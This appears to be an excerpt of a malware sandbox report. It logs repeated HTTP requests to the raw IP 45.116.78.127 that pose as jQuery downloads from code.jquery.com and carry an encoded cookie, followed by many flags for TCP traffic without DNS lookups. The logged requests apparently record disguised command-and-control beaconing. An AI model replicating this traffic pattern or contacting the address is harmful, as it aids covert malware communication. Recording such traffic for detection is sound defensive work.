        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
        Source: unknownTCP traffic detected without corresponding DNS query: 45.116.78.127
